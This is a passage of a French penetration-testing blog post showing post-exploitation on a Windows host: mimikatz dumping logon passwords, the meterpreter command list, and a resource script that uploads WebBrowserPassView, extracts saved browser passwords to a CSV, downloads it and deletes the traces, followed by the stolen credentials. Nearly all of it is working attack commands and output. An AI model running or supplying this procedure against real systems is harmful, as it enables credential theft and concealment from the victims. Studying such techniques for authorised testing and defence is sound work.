.#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Dec 14 2015 19:16:34)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser. )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 17 modules * * */
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 17762759 (00000000:010f09c7)
Session : Service from 0
User Name : DefaultAppPool
… / …
tspkg :
* Username : seb
* Domain : PC-seb-W8
* Password : Pa$$w0rd
wdigest :
* Username : seb
* Domain : PC-seb-W8
* Password : (null)
livessp :
kerberos :
* Username : seb
* Domain : PC-seb-W8
* Password : (null)
Récupérer les mots de passe enregistrés dans les navigateurs
Rechercher une commande permettant d’exécuter des commandes meterpreter (session déjà établie)
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
help Help menu
info Displays information about a Post module
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
sess Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for 'load'
uuid Get the UUID for the current session
write Writes data to a channel
Créer le fichier de commandes pour resource
root@kali:~# cat Steal-Password.txt
cd \
upload webbrowserpassview.exe
upload webbrowserpassview.cfg
execute -f WebBrowserPassView.exe -a "/scomma liste-pwd.csv"
download liste-pwd.csv
rm webbrowserpassview.exe
rm webbrowserpassview.cfg
rm liste-pwd.csv
Lancer resource avec le fichier de commandes
meterpreter > resource Steal-Password.txt
[*] Reading /root/Steal-Password.txt
[*] Running cd \
[*] Running upload webbrowserpassview.exe
[*] uploading : webbrowserpassview.exe -> webbrowserpassview.exe
[*] uploaded : webbrowserpassview.exe -> webbrowserpassview.exe
[*] Running upload webbrowserpassview.cfg
[*] uploading : webbrowserpassview.cfg -> webbrowserpassview.cfg
[*] uploaded : webbrowserpassview.cfg -> webbrowserpassview.cfg
[*] Running execute -f WebBrowserPassView.exe -a "/scomma liste-pwd.csv"
Process 3512 created.
[*] Running download liste-pwd.csv
[*] downloading: liste-pwd.csv -> liste-pwd.csv
[*] download : liste-pwd.csv -> liste-pwd.csv
[*] Running rm webbrowserpassview.exe
[*] Running rm webbrowserpassview.cfg
[*] Running rm liste-pwd.csv
Récupérer les mots de passe
root@kali:~# cat liste-pwd.csv
URL,Web Browser,User Name,Password,Password Strength,User Name Field,Password Field,Created Time,Modified Time
https://fr-fr.facebook.com/login,Internet Explorer 7.0 - 9.0,qsdqsdq,qsdqdqd,Medium,,,,
https://fr-fr.facebook.com/login.php,Internet Explorer 7.0 - 9.0,hjkhjkhj,hjkhjkhjk,Weak,,,,
root@kali:~#
Cet article reflète exclusivement l'opinion de ses auteurs et n’engage en aucune façon Consultingit. J'espère que ça vous a plu. Vos commentaires/remarques sont les bienvenus: